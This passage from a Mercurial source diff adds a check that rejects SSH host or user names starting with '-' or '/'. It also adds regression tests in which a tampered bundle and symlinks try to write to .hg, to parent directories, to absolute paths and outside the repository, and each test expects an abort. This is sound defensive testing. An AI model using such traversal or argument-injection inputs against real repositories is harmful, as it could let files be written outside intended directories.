205 pflag = 'plink' in sshcmd.lower() and '-P' or '-p'
205 args = user and ("%s@%s" % (user, host)) or host
206 args = user and ("%s@%s" % (user, host)) or host
206 return port and ("%s %s %s" % (args, pflag, port)) or args
207 if args.startswith('-') or args.startswith('/'):
208 raise error.Abort(
209 _('illegal ssh hostname or username starting with - or /: %s') %
210 args)
211 args = shellquote(args)
212 if port:
213 args = '%s %s %s' % (pflag, shellquote(port), args)
214 return args
207
215
208 def setflags(f, l, x):
216 def setflags(f, l, x):
209 pass
217 pass
210
218
211 def copymode(src, dst, mode=None):
219 def copymode(src, dst, mode=None):
212 pass
220 pass
213
221
214 def checkexec(path):
222 def checkexec(path):
215 return False
223 return False
216
224
217 def checklink(path):
225 def checklink(path):
218 return False
226 return False
219
227
220 def setbinary(fd):
228 def setbinary(fd):
221 # When run without console, pipes may expose invalid
229 # When run without console, pipes may expose invalid
222 # fileno(), usually set to -1.
230 # fileno(), usually set to -1.
223 fno = getattr(fd, 'fileno', None)
231 fno = getattr(fd, 'fileno', None)
224 if fno is not None and fno() >= 0:
232 if fno is not None and fno() >= 0:
225 msvcrt.setmode(fno(), os.O_BINARY)
233 msvcrt.setmode(fno(), os.O_BINARY)
226
234
227 def pconvert(path):
235 def pconvert(path):
228 return path.replace(pycompat.ossep, '/')
236 return path.replace(pycompat.ossep, '/')
229
237
230 def localpath(path):
238 def localpath(path):
231 return path.replace('/', '\\')
239 return path.replace('/', '\\')
232
240
233 def normpath(path):
241 def normpath(path):
234 return pconvert(os.path.normpath(path))
242 return pconvert(os.path.normpath(path))
235
243
236 def normcase(path):
244 def normcase(path):
237 return encoding.upper(path) # NTFS compares via upper()
245 return encoding.upper(path) # NTFS compares via upper()
238
246
239 # see posix.py for definitions
247 # see posix.py for definitions
240 normcasespec = encoding.normcasespecs.upper
248 normcasespec = encoding.normcasespecs.upper
241 normcasefallback = encoding.upperfallback
249 normcasefallback = encoding.upperfallback
242
250
243 def samestat(s1, s2):
251 def samestat(s1, s2):
244 return False
252 return False
245
253
246 # A sequence of backslashes is special iff it precedes a double quote:
254 # A sequence of backslashes is special iff it precedes a double quote:
247 # - if there's an even number of backslashes, the double quote is not
255 # - if there's an even number of backslashes, the double quote is not
248 # quoted (i.e. it ends the quoted region)
256 # quoted (i.e. it ends the quoted region)
249 # - if there's an odd number of backslashes, the double quote is quoted
257 # - if there's an odd number of backslashes, the double quote is quoted
250 # - in both cases, every pair of backslashes is unquoted into a single
258 # - in both cases, every pair of backslashes is unquoted into a single
251 # backslash
259 # backslash
252 # (See http://msdn2.microsoft.com/en-us/library/a1y7w461.aspx )
260 # (See http://msdn2.microsoft.com/en-us/library/a1y7w461.aspx )
253 # So, to quote a string, we must surround it in double quotes, double
261 # So, to quote a string, we must surround it in double quotes, double
254 # the number of backslashes that precede double quotes and add another
262 # the number of backslashes that precede double quotes and add another
255 # backslash before every double quote (being careful with the double
263 # backslash before every double quote (being careful with the double
256 # quote we've appended to the end)
264 # quote we've appended to the end)
257 _quotere = None
265 _quotere = None
258 _needsshellquote = None
266 _needsshellquote = None
259 def shellquote(s):
267 def shellquote(s):
260 r"""
268 r"""
261 >>> shellquote(r'C:\Users\xyz')
269 >>> shellquote(r'C:\Users\xyz')
262 '"C:\\Users\\xyz"'
270 '"C:\\Users\\xyz"'
263 >>> shellquote(r'C:\Users\xyz/mixed')
271 >>> shellquote(r'C:\Users\xyz/mixed')
264 '"C:\\Users\\xyz/mixed"'
272 '"C:\\Users\\xyz/mixed"'
265 >>> # Would be safe not to quote too, since it is all double backslashes
273 >>> # Would be safe not to quote too, since it is all double backslashes
266 >>> shellquote(r'C:\\Users\\xyz')
274 >>> shellquote(r'C:\\Users\\xyz')
267 '"C:\\\\Users\\\\xyz"'
275 '"C:\\\\Users\\\\xyz"'
268 >>> # But this must be quoted
276 >>> # But this must be quoted
269 >>> shellquote(r'C:\\Users\\xyz/abc')
277 >>> shellquote(r'C:\\Users\\xyz/abc')
270 '"C:\\\\Users\\\\xyz/abc"'
278 '"C:\\\\Users\\\\xyz/abc"'
271 """
279 """
272 global _quotere
280 global _quotere
273 if _quotere is None:
281 if _quotere is None:
274 _quotere = re.compile(r'(\\*)("|\\$)')
282 _quotere = re.compile(r'(\\*)("|\\$)')
275 global _needsshellquote
283 global _needsshellquote
276 if _needsshellquote is None:
284 if _needsshellquote is None:
277 # ":" is also treated as "safe character", because it is used as a part
285 # ":" is also treated as "safe character", because it is used as a part
278 # of path name on Windows. "\" is also part of a path name, but isn't
286 # of path name on Windows. "\" is also part of a path name, but isn't
279 # safe because shlex.split() (kind of) treats it as an escape char and
287 # safe because shlex.split() (kind of) treats it as an escape char and
280 # drops it. It will leave the next character, even if it is another
288 # drops it. It will leave the next character, even if it is another
281 # "\".
289 # "\".
282 _needsshellquote = re.compile(r'[^a-zA-Z0-9._:/-]').search
290 _needsshellquote = re.compile(r'[^a-zA-Z0-9._:/-]').search
283 if s and not _needsshellquote(s) and not _quotere.search(s):
291 if s and not _needsshellquote(s) and not _quotere.search(s):
284 # "s" shouldn't have to be quoted
292 # "s" shouldn't have to be quoted
285 return s
293 return s
286 return '"%s"' % _quotere.sub(r'\1\1\\\2', s)
294 return '"%s"' % _quotere.sub(r'\1\1\\\2', s)
287
295
288 def quotecommand(cmd):
296 def quotecommand(cmd):
289 """Build a command string suitable for os.popen* calls."""
297 """Build a command string suitable for os.popen* calls."""
290 if sys.version_info < (2, 7, 1):
298 if sys.version_info < (2, 7, 1):
291 # Python versions since 2.7.1 do this extra quoting themselves
299 # Python versions since 2.7.1 do this extra quoting themselves
292 return '"' + cmd + '"'
300 return '"' + cmd + '"'
293 return cmd
301 return cmd
294
302
295 def popen(command, mode='r'):
303 def popen(command, mode='r'):
296 # Work around "popen spawned process may not write to stdout
304 # Work around "popen spawned process may not write to stdout
297 # under windows"
305 # under windows"
298 # http://bugs.python.org/issue1366
306 # http://bugs.python.org/issue1366
299 command += " 2> %s" % os.devnull
307 command += " 2> %s" % os.devnull
300 return os.popen(quotecommand(command), mode)
308 return os.popen(quotecommand(command), mode)
301
309
302 def explainexit(code):
310 def explainexit(code):
303 return _("exited with status %d") % code, code
311 return _("exited with status %d") % code, code
304
312
305 # if you change this stub into a real check, please try to implement the
313 # if you change this stub into a real check, please try to implement the
306 # username and groupname functions above, too.
314 # username and groupname functions above, too.
307 def isowner(st):
315 def isowner(st):
308 return True
316 return True
309
317
310 def findexe(command):
318 def findexe(command):
311 '''Find executable for command searching like cmd.exe does.
319 '''Find executable for command searching like cmd.exe does.
312 If command is a basename then PATH is searched for command.
320 If command is a basename then PATH is searched for command.
313 PATH isn't searched if command is an absolute or relative path.
321 PATH isn't searched if command is an absolute or relative path.
314 An extension from PATHEXT is found and added if not present.
322 An extension from PATHEXT is found and added if not present.
315 If command isn't found None is returned.'''
323 If command isn't found None is returned.'''
316 pathext = encoding.environ.get('PATHEXT', '.COM;.EXE;.BAT;.CMD')
324 pathext = encoding.environ.get('PATHEXT', '.COM;.EXE;.BAT;.CMD')
317 pathexts = [ext for ext in pathext.lower().split(pycompat.ospathsep)]
325 pathexts = [ext for ext in pathext.lower().split(pycompat.ospathsep)]
318 if os.path.splitext(command)[1].lower() in pathexts:
326 if os.path.splitext(command)[1].lower() in pathexts:
319 pathexts = ['']
327 pathexts = ['']
320
328
321 def findexisting(pathcommand):
329 def findexisting(pathcommand):
322 'Will append extension (if needed) and return existing file'
330 'Will append extension (if needed) and return existing file'
323 for ext in pathexts:
331 for ext in pathexts:
324 executable = pathcommand + ext
332 executable = pathcommand + ext
325 if os.path.exists(executable):
333 if os.path.exists(executable):
326 return executable
334 return executable
327 return None
335 return None
328
336
329 if pycompat.ossep in command:
337 if pycompat.ossep in command:
330 return findexisting(command)
338 return findexisting(command)
331
339
332 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
340 for path in encoding.environ.get('PATH', '').split(pycompat.ospathsep):
333 executable = findexisting(os.path.join(path, command))
341 executable = findexisting(os.path.join(path, command))
334 if executable is not None:
342 if executable is not None:
335 return executable
343 return executable
336 return findexisting(os.path.expanduser(os.path.expandvars(command)))
344 return findexisting(os.path.expanduser(os.path.expandvars(command)))
337
345
338 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
346 _wantedkinds = {stat.S_IFREG, stat.S_IFLNK}
339
347
340 def statfiles(files):
348 def statfiles(files):
341 '''Stat each file in files. Yield each stat, or None if a file
349 '''Stat each file in files. Yield each stat, or None if a file
342 does not exist or has a type we don't care about.
350 does not exist or has a type we don't care about.
343
351
344 Cluster and cache stat per directory to minimize number of OS stat calls.'''
352 Cluster and cache stat per directory to minimize number of OS stat calls.'''
345 dircache = {} # dirname -> filename -> status | None if file does not exist
353 dircache = {} # dirname -> filename -> status | None if file does not exist
346 getkind = stat.S_IFMT
354 getkind = stat.S_IFMT
347 for nf in files:
355 for nf in files:
348 nf = normcase(nf)
356 nf = normcase(nf)
349 dir, base = os.path.split(nf)
357 dir, base = os.path.split(nf)
350 if not dir:
358 if not dir:
351 dir = '.'
359 dir = '.'
352 cache = dircache.get(dir, None)
360 cache = dircache.get(dir, None)
353 if cache is None:
361 if cache is None:
354 try:
362 try:
355 dmap = dict([(normcase(n), s)
363 dmap = dict([(normcase(n), s)
356 for n, k, s in listdir(dir, True)
364 for n, k, s in listdir(dir, True)
357 if getkind(s.st_mode) in _wantedkinds])
365 if getkind(s.st_mode) in _wantedkinds])
358 except OSError as err:
366 except OSError as err:
359 # Python >= 2.5 returns ENOENT and adds winerror field
367 # Python >= 2.5 returns ENOENT and adds winerror field
360 # EINVAL is raised if dir is not a directory.
368 # EINVAL is raised if dir is not a directory.
361 if err.errno not in (errno.ENOENT, errno.EINVAL,
369 if err.errno not in (errno.ENOENT, errno.EINVAL,
362 errno.ENOTDIR):
370 errno.ENOTDIR):
363 raise
371 raise
364 dmap = {}
372 dmap = {}
365 cache = dircache.setdefault(dir, dmap)
373 cache = dircache.setdefault(dir, dmap)
366 yield cache.get(base, None)
374 yield cache.get(base, None)
367
375
368 def username(uid=None):
376 def username(uid=None):
369 """Return the name of the user with the given uid.
377 """Return the name of the user with the given uid.
370
378
371 If uid is None, return the name of the current user."""
379 If uid is None, return the name of the current user."""
372 return None
380 return None
373
381
374 def groupname(gid=None):
382 def groupname(gid=None):
375 """Return the name of the group with the given gid.
383 """Return the name of the group with the given gid.
376
384
377 If gid is None, return the name of the current group."""
385 If gid is None, return the name of the current group."""
378 return None
386 return None
379
387
380 def removedirs(name):
388 def removedirs(name):
381 """special version of os.removedirs that does not remove symlinked
389 """special version of os.removedirs that does not remove symlinked
382 directories or junction points if they actually contain files"""
390 directories or junction points if they actually contain files"""
383 if listdir(name):
391 if listdir(name):
384 return
392 return
385 os.rmdir(name)
393 os.rmdir(name)
386 head, tail = os.path.split(name)
394 head, tail = os.path.split(name)
387 if not tail:
395 if not tail:
388 head, tail = os.path.split(head)
396 head, tail = os.path.split(head)
389 while head and tail:
397 while head and tail:
390 try:
398 try:
391 if listdir(head):
399 if listdir(head):
392 return
400 return
393 os.rmdir(head)
401 os.rmdir(head)
394 except (ValueError, OSError):
402 except (ValueError, OSError):
395 break
403 break
396 head, tail = os.path.split(head)
404 head, tail = os.path.split(head)
397
405
398 def rename(src, dst):
406 def rename(src, dst):
399 '''atomically rename file src to dst, replacing dst if it exists'''
407 '''atomically rename file src to dst, replacing dst if it exists'''
400 try:
408 try:
401 os.rename(src, dst)
409 os.rename(src, dst)
402 except OSError as e:
410 except OSError as e:
403 if e.errno != errno.EEXIST:
411 if e.errno != errno.EEXIST:
404 raise
412 raise
405 unlink(dst)
413 unlink(dst)
406 os.rename(src, dst)
414 os.rename(src, dst)
407
415
408 def gethgcmd():
416 def gethgcmd():
409 return [sys.executable] + sys.argv[:1]
417 return [sys.executable] + sys.argv[:1]
410
418
411 def groupmembers(name):
419 def groupmembers(name):
412 # Don't support groups on Windows for now
420 # Don't support groups on Windows for now
413 raise KeyError
421 raise KeyError
414
422
415 def isexec(f):
423 def isexec(f):
416 return False
424 return False
417
425
418 class cachestat(object):
426 class cachestat(object):
419 def __init__(self, path):
427 def __init__(self, path):
420 pass
428 pass
421
429
422 def cacheable(self):
430 def cacheable(self):
423 return False
431 return False
424
432
425 def lookupreg(key, valname=None, scope=None):
433 def lookupreg(key, valname=None, scope=None):
426 ''' Look up a key/value name in the Windows registry.
434 ''' Look up a key/value name in the Windows registry.
427
435
428 valname: value name. If unspecified, the default value for the key
436 valname: value name. If unspecified, the default value for the key
429 is used.
437 is used.
430 scope: optionally specify scope for registry lookup, this can be
438 scope: optionally specify scope for registry lookup, this can be
431 a sequence of scopes to look up in order. Default (CURRENT_USER,
439 a sequence of scopes to look up in order. Default (CURRENT_USER,
432 LOCAL_MACHINE).
440 LOCAL_MACHINE).
433 '''
441 '''
434 if scope is None:
442 if scope is None:
435 scope = (winreg.HKEY_CURRENT_USER, winreg.HKEY_LOCAL_MACHINE)
443 scope = (winreg.HKEY_CURRENT_USER, winreg.HKEY_LOCAL_MACHINE)
436 elif not isinstance(scope, (list, tuple)):
444 elif not isinstance(scope, (list, tuple)):
437 scope = (scope,)
445 scope = (scope,)
438 for s in scope:
446 for s in scope:
439 try:
447 try:
440 val = winreg.QueryValueEx(winreg.OpenKey(s, key), valname)[0]
448 val = winreg.QueryValueEx(winreg.OpenKey(s, key), valname)[0]
441 # never let a Unicode string escape into the wild
449 # never let a Unicode string escape into the wild
442 return encoding.unitolocal(val)
450 return encoding.unitolocal(val)
443 except EnvironmentError:
451 except EnvironmentError:
444 pass
452 pass
445
453
446 expandglobs = True
454 expandglobs = True
447
455
448 def statislink(st):
456 def statislink(st):
449 '''check whether a stat result is a symlink'''
457 '''check whether a stat result is a symlink'''
450 return False
458 return False
451
459
452 def statisexec(st):
460 def statisexec(st):
453 '''check whether a stat result is an executable file'''
461 '''check whether a stat result is an executable file'''
454 return False
462 return False
455
463
456 def poll(fds):
464 def poll(fds):
457 # see posix.py for description
465 # see posix.py for description
458 raise NotImplementedError()
466 raise NotImplementedError()
459
467
460 def readpipe(pipe):
468 def readpipe(pipe):
461 """Read all available data from a pipe."""
469 """Read all available data from a pipe."""
462 chunks = []
470 chunks = []
463 while True:
471 while True:
464 size = win32.peekpipe(pipe)
472 size = win32.peekpipe(pipe)
465 if not size:
473 if not size:
466 break
474 break
467
475
468 s = pipe.read(size)
476 s = pipe.read(size)
469 if not s:
477 if not s:
470 break
478 break
471 chunks.append(s)
479 chunks.append(s)
472
480
473 return ''.join(chunks)
481 return ''.join(chunks)
474
482
475 def bindunixsocket(sock, path):
483 def bindunixsocket(sock, path):
476 raise NotImplementedError('unsupported platform')
484 raise NotImplementedError('unsupported platform')
@@ -1,131 +1,231 b''
1 $ hg init
1 $ hg init
2
2
3 audit of .hg
3 audit of .hg
4
4
5 $ hg add .hg/00changelog.i
5 $ hg add .hg/00changelog.i
6 abort: path contains illegal component: .hg/00changelog.i (glob)
6 abort: path contains illegal component: .hg/00changelog.i (glob)
7 [255]
7 [255]
8
8
9 #if symlink
9 #if symlink
10
10
11 Symlinks
11 Symlinks
12
12
13 $ mkdir a
13 $ mkdir a
14 $ echo a > a/a
14 $ echo a > a/a
15 $ hg ci -Ama
15 $ hg ci -Ama
16 adding a/a
16 adding a/a
17 $ ln -s a b
17 $ ln -s a b
18 $ echo b > a/b
18 $ echo b > a/b
19 $ hg add b/b
19 $ hg add b/b
20 abort: path 'b/b' traverses symbolic link 'b' (glob)
20 abort: path 'b/b' traverses symbolic link 'b' (glob)
21 [255]
21 [255]
22 $ hg add b
22 $ hg add b
23
23
24 should still fail - maybe
24 should still fail - maybe
25
25
26 $ hg add b/b
26 $ hg add b/b
27 abort: path 'b/b' traverses symbolic link 'b' (glob)
27 abort: path 'b/b' traverses symbolic link 'b' (glob)
28 [255]
28 [255]
29
29
30 $ hg commit -m 'add symlink b'
30 $ hg commit -m 'add symlink b'
31
31
32
32
33 Test symlink traversing when accessing history:
33 Test symlink traversing when accessing history:
34 -----------------------------------------------
34 -----------------------------------------------
35
35
36 (build a changeset where the path exists as a directory)
36 (build a changeset where the path exists as a directory)
37
37
38 $ hg up 0
38 $ hg up 0
39 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
39 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
40 $ mkdir b
40 $ mkdir b
41 $ echo c > b/a
41 $ echo c > b/a
42 $ hg add b/a
42 $ hg add b/a
43 $ hg ci -m 'add directory b'
43 $ hg ci -m 'add directory b'
44 created new head
44 created new head
45
45
46 Test that hg cat does not do anything wrong the working copy has 'b' as directory
46 Test that hg cat does not do anything wrong the working copy has 'b' as directory
47
47
48 $ hg cat b/a
48 $ hg cat b/a
49 c
49 c
50 $ hg cat -r "desc(directory)" b/a
50 $ hg cat -r "desc(directory)" b/a
51 c
51 c
52 $ hg cat -r "desc(symlink)" b/a
52 $ hg cat -r "desc(symlink)" b/a
53 b/a: no such file in rev bc151a1f53bd
53 b/a: no such file in rev bc151a1f53bd
54 [1]
54 [1]
55
55
56 Test that hg cat does not do anything wrong the working copy has 'b' as a symlink (issue4749)
56 Test that hg cat does not do anything wrong the working copy has 'b' as a symlink (issue4749)
57
57
58 $ hg up 'desc(symlink)'
58 $ hg up 'desc(symlink)'
59 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
59 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
60 $ hg cat b/a
60 $ hg cat b/a
61 b/a: no such file in rev bc151a1f53bd
61 b/a: no such file in rev bc151a1f53bd
62 [1]
62 [1]
63 $ hg cat -r "desc(directory)" b/a
63 $ hg cat -r "desc(directory)" b/a
64 c
64 c
65 $ hg cat -r "desc(symlink)" b/a
65 $ hg cat -r "desc(symlink)" b/a
66 b/a: no such file in rev bc151a1f53bd
66 b/a: no such file in rev bc151a1f53bd
67 [1]
67 [1]
68
68
69 #endif
69 #endif
70
70
71
71
72 unbundle tampered bundle
72 unbundle tampered bundle
73
73
74 $ hg init target
74 $ hg init target
75 $ cd target
75 $ cd target
76 $ hg unbundle "$TESTDIR/bundles/tampered.hg"
76 $ hg unbundle "$TESTDIR/bundles/tampered.hg"
77 adding changesets
77 adding changesets
78 adding manifests
78 adding manifests
79 adding file changes
79 adding file changes
80 added 5 changesets with 6 changes to 6 files (+4 heads)
80 added 5 changesets with 6 changes to 6 files (+4 heads)
81 (run 'hg heads' to see heads, 'hg merge' to merge)
81 (run 'hg heads' to see heads, 'hg merge' to merge)
82
82
83 attack .hg/test
83 attack .hg/test
84
84
85 $ hg manifest -r0
85 $ hg manifest -r0
86 .hg/test
86 .hg/test
87 $ hg update -Cr0
87 $ hg update -Cr0
88 abort: path contains illegal component: .hg/test (glob)
88 abort: path contains illegal component: .hg/test (glob)
89 [255]
89 [255]
90
90
91 attack foo/.hg/test
91 attack foo/.hg/test
92
92
93 $ hg manifest -r1
93 $ hg manifest -r1
94 foo/.hg/test
94 foo/.hg/test
95 $ hg update -Cr1
95 $ hg update -Cr1
96 abort: path 'foo/.hg/test' is inside nested repo 'foo' (glob)
96 abort: path 'foo/.hg/test' is inside nested repo 'foo' (glob)
97 [255]
97 [255]
98
98
99 attack back/test where back symlinks to ..
99 attack back/test where back symlinks to ..
100
100
101 $ hg manifest -r2
101 $ hg manifest -r2
102 back
102 back
103 back/test
103 back/test
104 #if symlink
104 #if symlink
105 $ hg update -Cr2
105 $ hg update -Cr2
106 abort: path 'back/test' traverses symbolic link 'back'
106 abort: path 'back/test' traverses symbolic link 'back'
107 [255]
107 [255]
108 #else
108 #else
109 ('back' will be a file and cause some other system specific error)
109 ('back' will be a file and cause some other system specific error)
110 $ hg update -Cr2
110 $ hg update -Cr2
111 abort: * (glob)
111 abort: * (glob)
112 [255]
112 [255]
113 #endif
113 #endif
114
114
115 attack ../test
115 attack ../test
116
116
117 $ hg manifest -r3
117 $ hg manifest -r3
118 ../test
118 ../test
119 $ hg update -Cr3
119 $ hg update -Cr3
120 abort: path contains illegal component: ../test (glob)
120 abort: path contains illegal component: ../test (glob)
121 [255]
121 [255]
122
122
123 attack /tmp/test
123 attack /tmp/test
124
124
125 $ hg manifest -r4
125 $ hg manifest -r4
126 /tmp/test
126 /tmp/test
127 $ hg update -Cr4
127 $ hg update -Cr4
128 abort: path contains illegal component: /tmp/test (glob)
128 abort: path contains illegal component: /tmp/test (glob)
129 [255]
129 [255]
130
130
131 $ cd ..
131 $ cd ..
132
133 Test symlink traversal on merge:
134 --------------------------------
135
136 #if symlink
137
138 set up symlink hell
139
140 $ mkdir merge-symlink-out
141 $ hg init merge-symlink
142 $ cd merge-symlink
143 $ touch base
144 $ hg commit -qAm base
145 $ ln -s ../merge-symlink-out a
146 $ hg commit -qAm 'symlink a -> ../merge-symlink-out'
147 $ hg up -q 0
148 $ mkdir a
149 $ touch a/poisoned
150 $ hg commit -qAm 'file a/poisoned'
151 $ hg log -G -T '{rev}: {desc}\n'
152 @ 2: file a/poisoned
153 |
154 | o 1: symlink a -> ../merge-symlink-out
155 |/
156 o 0: base
157
158
159 try trivial merge
160
161 $ hg up -qC 1
162 $ hg merge 2
163 abort: path 'a/poisoned' traverses symbolic link 'a'
164 [255]
165
166 try rebase onto other revision: cache of audited paths should be discarded,
167 and the rebase should fail (issue5628)
168
169 $ hg up -qC 2
170 $ hg rebase -s 2 -d 1 --config extensions.rebase=
171 rebasing 2:e73c21d6b244 "file a/poisoned" (tip)
172 abort: path 'a/poisoned' traverses symbolic link 'a'
173 [255]
174 $ ls ../merge-symlink-out
175
176 $ cd ..
177
178 Test symlink traversal on update:
179 ---------------------------------
180
181 $ mkdir update-symlink-out
182 $ hg init update-symlink
183 $ cd update-symlink
184 $ ln -s ../update-symlink-out a
185 $ hg commit -qAm 'symlink a -> ../update-symlink-out'
186 $ hg rm a
187 $ mkdir a && touch a/b
188 $ hg ci -qAm 'file a/b' a/b
189 $ hg up -qC 0
190 $ hg rm a
191 $ mkdir a && touch a/c
192 $ hg ci -qAm 'rm a, file a/c'
193 $ hg log -G -T '{rev}: {desc}\n'
194 @ 2: rm a, file a/c
195 |
196 | o 1: file a/b
197 |/
198 o 0: symlink a -> ../update-symlink-out
199
200
201 try linear update where symlink already exists:
202
203 $ hg up -qC 0
204 $ hg up 1
205 abort: path 'a/b' traverses symbolic link 'a'
206 [255]
207
208 try linear update including symlinked directory and its content: paths are
209 audited first by calculateupdates(), where no symlink is created so both
210 'a' and 'a/b' are taken as good paths. still applyupdates() should fail.
211
212 $ hg up -qC null
213 $ hg up 1
214 abort: path 'a/b' traverses symbolic link 'a'
215 [255]
216 $ ls ../update-symlink-out
217
218 try branch update replacing directory with symlink, and its content: the
219 path 'a' is audited as a directory first, which should be audited again as
220 a symlink.
221
222 $ rm -f a
223 $ hg up -qC 2
224 $ hg up 1
225 abort: path 'a/b' traverses symbolic link 'a'
226 [255]
227 $ ls ../update-symlink-out
228
229 $ cd ..
230
231 #endif
@@ -1,1099 +1,1162 b''
1 Prepare repo a:
1 Prepare repo a:
2
2
3 $ hg init a
3 $ hg init a
4 $ cd a
4 $ cd a
5 $ echo a > a
5 $ echo a > a
6 $ hg add a
6 $ hg add a
7 $ hg commit -m test
7 $ hg commit -m test
8 $ echo first line > b
8 $ echo first line > b
9 $ hg add b
9 $ hg add b
10
10
11 Create a non-inlined filelog:
11 Create a non-inlined filelog:
12
12
13 $ $PYTHON -c 'file("data1", "wb").write("".join("%s\n" % x for x in range(10000)))'
13 $ $PYTHON -c 'file("data1", "wb").write("".join("%s\n" % x for x in range(10000)))'
14 $ for j in 0 1 2 3 4 5 6 7 8 9; do
14 $ for j in 0 1 2 3 4 5 6 7 8 9; do
15 > cat data1 >> b
15 > cat data1 >> b
16 > hg commit -m test
16 > hg commit -m test
17 > done
17 > done
18
18
19 List files in store/data (should show a 'b.d'):
19 List files in store/data (should show a 'b.d'):
20
20
21 $ for i in .hg/store/data/*; do
21 $ for i in .hg/store/data/*; do
22 > echo $i
22 > echo $i
23 > done
23 > done
24 .hg/store/data/a.i
24 .hg/store/data/a.i
25 .hg/store/data/b.d
25 .hg/store/data/b.d
26 .hg/store/data/b.i
26 .hg/store/data/b.i
27
27
28 Trigger branchcache creation:
28 Trigger branchcache creation:
29
29
30 $ hg branches
30 $ hg branches
31 default 10:a7949464abda
31 default 10:a7949464abda
32 $ ls .hg/cache
32 $ ls .hg/cache
33 branch2-served
33 branch2-served
34 checkisexec (execbit !)
34 checkisexec (execbit !)
35 checklink (symlink !)
35 checklink (symlink !)
36 checklink-target (symlink !)
36 checklink-target (symlink !)
37 checknoexec (execbit !)
37 checknoexec (execbit !)
38 rbc-names-v1
38 rbc-names-v1
39 rbc-revs-v1
39 rbc-revs-v1
40
40
41 Default operation:
41 Default operation:
42
42
43 $ hg clone . ../b
43 $ hg clone . ../b
44 updating to branch default
44 updating to branch default
45 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
45 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
46 $ cd ../b
46 $ cd ../b
47
47
48 Ensure branchcache got copied over:
48 Ensure branchcache got copied over:
49
49
50 $ ls .hg/cache
50 $ ls .hg/cache
51 branch2-served
51 branch2-served
52 checkisexec (execbit !)
52 checkisexec (execbit !)
53 checklink (symlink !)
53 checklink (symlink !)
54 checklink-target (symlink !)
54 checklink-target (symlink !)
55 rbc-names-v1
55 rbc-names-v1
56 rbc-revs-v1
56 rbc-revs-v1
57
57
58 $ cat a
58 $ cat a
59 a
59 a
60 $ hg verify
60 $ hg verify
61 checking changesets
61 checking changesets
62 checking manifests
62 checking manifests
63 crosschecking files in changesets and manifests
63 crosschecking files in changesets and manifests
64 checking files
64 checking files
65 2 files, 11 changesets, 11 total revisions
65 2 files, 11 changesets, 11 total revisions
66
66
67 Invalid dest '' must abort:
67 Invalid dest '' must abort:
68
68
69 $ hg clone . ''
69 $ hg clone . ''
70 abort: empty destination path is not valid
70 abort: empty destination path is not valid
71 [255]
71 [255]
72
72
73 No update, with debug option:
73 No update, with debug option:
74
74
75 #if hardlink
75 #if hardlink
76 $ hg --debug clone -U . ../c --config progress.debug=true
76 $ hg --debug clone -U . ../c --config progress.debug=true
77 linking: 1
77 linking: 1
78 linking: 2
78 linking: 2
79 linking: 3
79 linking: 3
80 linking: 4
80 linking: 4
81 linking: 5
81 linking: 5
82 linking: 6
82 linking: 6
83 linking: 7
83 linking: 7
84 linking: 8
84 linking: 8
85 linked 8 files
85 linked 8 files
86 #else
86 #else
87 $ hg --debug clone -U . ../c --config progress.debug=true
87 $ hg --debug clone -U . ../c --config progress.debug=true
88 linking: 1
88 linking: 1
89 copying: 2
89 copying: 2
90 copying: 3
90 copying: 3
91 copying: 4
91 copying: 4
92 copying: 5
92 copying: 5
93 copying: 6
93 copying: 6
94 copying: 7
94 copying: 7
95 copying: 8
95 copying: 8
96 copied 8 files
96 copied 8 files
97 #endif
97 #endif
98 $ cd ../c
98 $ cd ../c
99
99
100 Ensure branchcache got copied over:
100 Ensure branchcache got copied over:
101
101
102 $ ls .hg/cache
102 $ ls .hg/cache
103 branch2-served
103 branch2-served
104 rbc-names-v1
104 rbc-names-v1
105 rbc-revs-v1
105 rbc-revs-v1
106
106
107 $ cat a 2>/dev/null || echo "a not present"
107 $ cat a 2>/dev/null || echo "a not present"
108 a not present
108 a not present
109 $ hg verify
109 $ hg verify
110 checking changesets
110 checking changesets
111 checking manifests
111 checking manifests
112 crosschecking files in changesets and manifests
112 crosschecking files in changesets and manifests
113 checking files
113 checking files
114 2 files, 11 changesets, 11 total revisions
114 2 files, 11 changesets, 11 total revisions
115
115
116 Default destination:
116 Default destination:
117
117
118 $ mkdir ../d
118 $ mkdir ../d
119 $ cd ../d
119 $ cd ../d
120 $ hg clone ../a
120 $ hg clone ../a
121 destination directory: a
121 destination directory: a
122 updating to branch default
122 updating to branch default
123 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
123 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
124 $ cd a
124 $ cd a
125 $ hg cat a
125 $ hg cat a
126 a
126 a
127 $ cd ../..
127 $ cd ../..
128
128
129 Check that we drop the 'file:' from the path before writing the .hgrc:
129 Check that we drop the 'file:' from the path before writing the .hgrc:
130
130
131 $ hg clone file:a e
131 $ hg clone file:a e
132 updating to branch default
132 updating to branch default
133 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
133 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
134 $ grep 'file:' e/.hg/hgrc
134 $ grep 'file:' e/.hg/hgrc
135 [1]
135 [1]
136
136
137 Check that path aliases are expanded:
137 Check that path aliases are expanded:
138
138
139 $ hg clone -q -U --config 'paths.foobar=a#0' foobar f
139 $ hg clone -q -U --config 'paths.foobar=a#0' foobar f
140 $ hg -R f showconfig paths.default
140 $ hg -R f showconfig paths.default
141 $TESTTMP/a#0 (glob)
141 $TESTTMP/a#0 (glob)
142
142
143 Use --pull:
143 Use --pull:
144
144
145 $ hg clone --pull a g
145 $ hg clone --pull a g
146 requesting all changes
146 requesting all changes
147 adding changesets
147 adding changesets
148 adding manifests
148 adding manifests
149 adding file changes
149 adding file changes
150 added 11 changesets with 11 changes to 2 files
150 added 11 changesets with 11 changes to 2 files
151 updating to branch default
151 updating to branch default
152 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
152 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
153 $ hg -R g verify
153 $ hg -R g verify
154 checking changesets
154 checking changesets
155 checking manifests
155 checking manifests
156 crosschecking files in changesets and manifests
156 crosschecking files in changesets and manifests
157 checking files
157 checking files
158 2 files, 11 changesets, 11 total revisions
158 2 files, 11 changesets, 11 total revisions
159
159
160 Invalid dest '' with --pull must abort (issue2528):
